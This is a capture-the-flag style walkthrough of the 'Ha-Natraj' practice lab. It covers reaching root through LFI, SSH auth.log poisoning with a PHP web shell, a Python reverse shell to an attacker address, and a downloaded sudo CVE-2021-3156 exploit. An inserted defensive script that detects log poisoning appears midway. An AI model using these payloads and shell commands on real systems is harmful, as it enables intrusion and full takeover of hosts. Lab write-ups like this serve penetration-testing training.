Ha-Natraj OffSec Walkthrough


Ha-Natraj OffSec Walkthrough: Today we’re going to solve another boot2root challenge called “Ha-Natraj”. It’s available on OffSec Play for penetration testing practice. This lab is not difficult if we have the right basic knowledge to break labs and are attentive to every detail we find during reconnaissance. An LFI combined with auth.log poisoning gives a foothold on the machine, followed by privilege escalation via apache2 services run as sudo.

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • Dirb

Exploitation

  • RCE with LFI and SSH Log Poisoning

Privilege Escalation

  • Abuse of Apache configuration file permissions
  • Abusing SUDO
  • Capture the flag

Walkthrough

Reconnaissance

So, let’s start by listing all the TCP ports with nmap.

nmap -sV -sC -p- 192.168.10.156

Enumeration

We started by visiting the web service (port 80), where we found several pictures and some information about Natraj. We checked the source code and robots.txt, but there seems to be nothing useful there (at least for the moment). So let’s proceed further.


With the help of Dirb and its default wordlist, we found a directory called “console“.


Inside it we find a file called “file.php“:


If we request it, we see that it does nothing on its own. It probably expects a parameter.


Next I used the file name as the name of a GET parameter (“file”) and did a proof of concept (PoC) to check whether the page was vulnerable to Local File Inclusion (LFI).


Exploitation

After examining the response I confirmed that the page was vulnerable and that the site was running on an Apache server. I first tried to get RCE (Remote Command Execution) by poisoning the Apache access log, but that was not successful.

After testing other options, I saw that I could read the “auth.log” file, where the SSH service logs appear: requesting it through the “file” parameter returns its contents in the server response.

Since whatever a client sends to the SSH service ends up in that log, we can write PHP code into it through the SSH connection itself. I connected to port 22 with Netcat and sent a PHP one-liner instead of an SSH banner:

sudo nc -nv 192.168.167.80 22
<?php system($_GET['cmd']); ?>

Going back to the vulnerable endpoint and including auth.log, we can see the injected PHP being executed: the output of the command passed in the cmd parameter appears in the page.

 http://192.168.167.80/console/file.php?file=/var/log/auth.log&cmd=id
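From the defender’s side, the two steps above leave a distinctive trail: an sshd entry in auth.log that contains a PHP tag, followed by a web request that includes that log through the “file” parameter. The script below is an added example, not part of the original walkthrough; the log lines are constructed samples, and the host name, user name, ports and timestamps are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample data (not from the original page): what sshd logs when a raw
# client sends a PHP tag instead of an SSH banner, and what Apache's access log
# shows when that log is afterwards included through the vulnerable endpoint.
AUTH_LOG = """\
Jul 10 12:00:01 natraj sshd[1021]: Accepted password for mahakal from 192.168.167.142 port 50122 ssh2
Jul 10 12:01:15 natraj sshd[1044]: Bad protocol version identification '<?php system($_GET['cmd']); ?>' from 192.168.167.142 port 50130
Jul 10 12:02:40 natraj sshd[1050]: Invalid user admin from 192.168.167.142 port 50140
"""
ACCESS_LOG = """\
192.168.167.142 - - [10/Jul/2024:12:00:30 +0000] "GET /console/file.php?file=index.php HTTP/1.1" 200 512
192.168.167.142 - - [10/Jul/2024:12:03:02 +0000] "GET /console/file.php?file=/var/log/auth.log&cmd=id HTTP/1.1" 200 2048
"""

PHP_TAG = re.compile(r"<\?(php|=)|\?>", re.IGNORECASE)      # PHP open/close tags in log text
LOG_INCLUDE = re.compile(r"[?&]file=[^ &\"]*/var/log/")      # file= parameter pointing at a log
IP_FROM = re.compile(r" from (\d{1,3}(?:\.\d{1,3}){3})")    # client address in sshd messages


def poisoned_auth_lines(text: str) -> List[str]:
    """auth.log lines where an sshd message carries PHP code."""
    return [ln for ln in text.splitlines() if "sshd[" in ln and PHP_TAG.search(ln)]


def lfi_log_reads(text: str) -> List[str]:
    """Access-log requests that pull a file under /var/log through the file= parameter."""
    return [ln for ln in text.splitlines() if LOG_INCLUDE.search(ln)]


def analyse(auth_text: str, access_text: str) -> Dict[str, object]:
    """Correlate both signals; a poisoned sshd entry plus a web request including
    auth.log from the same client is a strong indicator of LFI log poisoning."""
    poisoned = poisoned_auth_lines(auth_text)
    reads = lfi_log_reads(access_text)
    poison_ips = {m.group(1) for m in map(IP_FROM.search, poisoned) if m}
    read_ips = {ln.split(" ", 1)[0] for ln in reads}
    return {
        "poisoned_entries": poisoned,
        "log_include_requests": reads,
        "shared_sources": sorted(poison_ips & read_ips),
        "alert": bool(poisoned and reads),
    }


if __name__ == "__main__":
    for key, value in analyse(AUTH_LOG, ACCESS_LOG).items():
        print(f"{key}: {value}")
```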

Having verified that the PHP injection worked, I aimed to get a reverse shell using Python. First I started a Netcat listener:

nc -lnvp 4444

Then I put the Python reverse shell into the URL as the value of the cmd parameter:

cmd=python3 -c 'import socket, subprocess, os; s=socket.socket(); s.connect(("192.168.167.142", 4444)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call(["/bin/sh", "-i"])'

The target then connects back to our listener and we get a shell.


Privilege Escalation (user)

sudo --version

The installed sudo version is 1.8.21p2, which is vulnerable to CVE-2021-3156.

Exploit: https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py

Download the exploit and start a Python web server on the attacking machine to serve it:

python3 -m http.server

Back on the target, fetch the exploit from 192.168.167.142:8000/exploit_nss.py into the /tmp directory and run it:

$ cd /tmp
$ wget 192.168.167.142:8000/exploit_nss.py
$ chmod +x exploit_nss.py
$ python3 exploit_nss.py
# cd /root
# ls
proof.txt

That solves the lab. See you in the next one 😉
